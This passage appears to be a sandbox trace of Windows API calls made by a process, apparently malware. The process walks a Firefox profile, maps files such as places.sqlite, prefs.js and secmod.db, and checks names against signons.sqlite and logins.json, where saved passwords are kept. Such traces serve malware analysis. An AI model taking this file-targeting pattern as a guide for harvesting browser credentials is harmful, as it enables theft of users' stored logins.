(lpString1="minidumps", lpString2=".") returned 1 [0589.729] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0589.729] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.729] lstrlenW (lpString="\\") returned 1 [0589.729] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.729] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.729] lstrlenW (lpString="minidumps") returned 9 [0589.729] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.729] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578b10 [0589.729] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.729] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.729] lstrlenW (lpString="\\*.*") returned 4 [0589.729] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0589.729] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.729] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0x57ca60 [0589.729] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.729] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 1 [0589.729] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.729] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.729] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd84 | out: lpFindFileData=0x52dd84) returned 0 [0589.729] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0589.729] LocalFree (hMem=0x56afc8) returned 0x0 [0589.729] LocalFree (hMem=0x578b10) returned 0x0 [0589.729] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.730] lstrlenW (lpString="\\") returned 1 [0589.730] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.730] lstrlenW (lpString="parent.lock") returned 11 [0589.730] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578b10 [0589.730] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.730] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.730] CloseHandle (hObject=0x5ac) returned 1 [0589.730] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59a8a0 [0589.730] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x59a8a0, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0589.730] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.730] CloseHandle (hObject=0x5ac) returned 1 [0589.730] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.730] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.730] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.730] CloseHandle (hObject=0x5ac) returned 1 [0589.730] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.730] StrStrIW (lpFirst="parent.lock", lpSrch="signons.sqlite") returned 0x0 [0589.730] StrStrIW (lpFirst="parent.lock", lpSrch="logins.json") returned 0x0 [0589.730] LocalFree (hMem=0x578b10) returned 0x0 [0589.730] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.730] lstrlenW (lpString="\\") returned 1 [0589.730] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.730] lstrlenW (lpString="permissions.sqlite") returned 18 [0589.730] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.730] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.730] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.730] CloseHandle (hObject=0x5ac) returned 1 [0589.730] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.730] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.730] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0589.730] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.731] CloseHandle (hObject=0x5ac) returned 1 [0589.731] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.731] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.731] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.731] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.731] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.732] CloseHandle (hObject=0x4c8) returned 1 [0589.732] CloseHandle (hObject=0x5ac) returned 1 [0589.732] LocalFree (hMem=0x56c300) returned 0x0 [0589.732] LocalFree (hMem=0x56afc8) returned 0x0 [0589.732] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.732] lstrlenW (lpString="\\") returned 1 [0589.732] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.732] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.732] lstrlenW (lpString="places.sqlite") returned 13 [0589.732] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.732] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.732] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.732] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.732] CloseHandle (hObject=0x5ac) returned 1 [0589.732] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.732] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.732] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0589.732] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.732] CloseHandle (hObject=0x5ac) returned 1 [0589.732] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.732] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0589.732] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.732] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.825] LocalFree (hMem=0x56c300) returned 0x0 [0589.826] LocalFree (hMem=0x56afc8) returned 0x0 [0589.826] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.826] lstrlenW (lpString="\\") returned 1 [0589.826] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.826] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.826] lstrlenW (lpString="pluginreg.dat") returned 13 [0589.826] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.826] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.826] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.826] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.826] CloseHandle (hObject=0x5ac) returned 1 [0589.826] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0589.826] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56c300 [0589.826] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x56c300, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0589.826] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.826] CloseHandle (hObject=0x5ac) returned 1 [0589.826] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.826] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0589.826] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.826] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.826] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.827] CloseHandle (hObject=0x4c8) returned 1 [0589.827] CloseHandle (hObject=0x5ac) returned 1 [0589.827] LocalFree (hMem=0x56c300) returned 0x0 [0589.827] LocalFree (hMem=0x56afc8) returned 0x0 [0589.827] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.827] lstrlenW (lpString="\\") returned 1 [0589.827] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.827] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.827] lstrlenW (lpString="prefs.js") returned 8 [0589.827] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.827] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578b10 [0589.827] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.827] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.827] CloseHandle (hObject=0x5ac) returned 1 [0589.827] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0589.827] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x59a8a0 [0589.827] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x59a8a0, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0589.827] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.827] CloseHandle (hObject=0x5ac) returned 1 [0589.827] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.827] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0589.827] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.827] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.827] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.828] CloseHandle (hObject=0x4c8) returned 1 [0589.828] CloseHandle (hObject=0x5ac) returned 1 [0589.828] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.828] LocalFree (hMem=0x578b10) returned 0x0 [0589.828] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.828] lstrlenW (lpString="\\") returned 1 [0589.828] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.828] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.828] lstrlenW (lpString="search.json") returned 11 [0589.828] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.828] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578b10 [0589.828] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.828] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.828] CloseHandle (hObject=0x5ac) returned 1 [0589.828] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.828] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x59a8a0 [0589.828] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x59a8a0, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0589.828] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.828] CloseHandle (hObject=0x5ac) returned 1 [0589.828] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.828] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0589.828] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.828] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.829] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.829] CloseHandle (hObject=0x4c8) returned 1 [0589.829] CloseHandle (hObject=0x5ac) returned 1 [0589.829] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.829] LocalFree (hMem=0x578b10) returned 0x0 [0589.829] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.829] lstrlenW (lpString="\\") returned 1 [0589.829] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.829] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.829] lstrlenW (lpString="secmod.db") returned 9 [0589.829] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.829] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x578b10 [0589.829] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.829] CloseHandle (hObject=0x5ac) returned 1 [0589.829] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x56 [0589.829] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x59a8a0 [0589.829] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db", lpDst=0x59a8a0, nSize=0x56 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db") returned 0x56 [0589.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.829] CloseHandle (hObject=0x5ac) returned 1 [0589.829] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0589.830] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0589.830] CreateFileMappingW (hFile=0x5ac, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4c8 [0589.830] MapViewOfFile (hFileMappingObject=0x4c8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.830] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.830] CloseHandle (hObject=0x4c8) returned 1 [0589.830] CloseHandle (hObject=0x5ac) returned 1 [0589.830] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.830] LocalFree (hMem=0x578b10) returned 0x0 [0589.830] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dffc | out: lpFindFileData=0x52dffc) returned 1 [0589.830] lstrlenW (lpString="\\") returned 1 [0589.830] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.830] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x59a8a0 [0589.830] lstrlenW (lpString="sessionstore.bak") returned 16 